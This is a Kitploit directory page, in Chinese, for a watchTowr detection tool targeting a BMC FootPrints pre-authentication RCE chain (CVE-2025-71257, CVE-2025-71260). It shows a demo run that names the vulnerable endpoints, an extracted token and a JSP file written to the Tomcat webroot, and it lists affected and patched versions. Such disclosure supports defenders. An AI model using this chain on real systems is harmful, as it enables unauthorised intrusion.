Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260 — 检测产物生成器,通过绕过身份验证并写入 JSP 文件来枚举系统信息,从而验证 BMC FootPrints 实例是否存在预认证 RCE 漏洞链(CVE-2025-71257、CVE-2025-71260)。 | Kitploit
工具/GitHubGitHub/watchtowrlabs/watchtowr-vs-bmc-footprints-rce-cve-2025-71257-cve-2025-71260
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试身份验证红队
GitHubwatchtowrlabs/watchtowr-vs-bmc-footprints-rce-cve-2025-71257-cve-2025-71260

watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260

检测产物生成器,通过绕过身份验证并写入 JSP 文件来枚举系统信息,从而验证 BMC FootPrints 实例是否存在预认证 RCE 漏洞链(CVE-2025-71257、CVE-2025-71260)。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
25个月前尚未审核

CVE-2025-71257 与 CVE-2025-71260 BMC FootPrints 预认证远程代码执行链

BMC FootPrints 预认证远程代码执行链检测工件生成器工具

描述

此检测工件生成器可验证 BMC FootPrints 实例是否易受 CVE-2025-71257 和 CVE-2025-71260 的攻击。

检测工件生成器尝试执行两项操作:

  • 使用 CVE-2025-71257 绕过身份验证 - 此检查非常准确。
  • 如果成功,它将尝试通过向 tomcat 服务器的 webroot 写入一个随机化的 .jsp 文件来验证 CVE-2025-71260 远程代码执行漏洞。该 .jsp 文件仅枚举系统信息。

检测演示

针对易受攻击的实例进行测试:

root@kitploit:~
python3 watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py http://192.168.2.2
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py

        (*) BMC Footprints Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-71257, CVE-2025-71260]
        
============================================================
Detection Artifact Generator Tool
============================================================
Target: http://192.168.2.2

[+] Making first request to: http://192.168.2.2/footprints/servicedesk/passwordreset/request/
[+] Successfully extracted SEC_TOKEN: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h

[+] Making second request to: http://192.168.2.2footprints/servicedesk/aspnetconfig
[+] Using token: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h
[+] Using randomized JSP name: MNdeu12Wf

[+] Making third request to: http://192.168.2.2/MNdeu12Wf.jsp (randomized artifact)

==================================================
EXTRACTED INFORMATION:
==================================================
Username: LOCAL SERVICE
Working Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0
==================================================

[+] Detection Artifact Generator Completed!

受影响版本

BMC FootPrints: from 20.20.02 to 20.24.01.001

可用修补程序

20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, 20.24.01

参考: https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/

关注 watchTowr Labs

如需了解最新安全研究,请关注 watchTowr Labs 团队

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

下载工具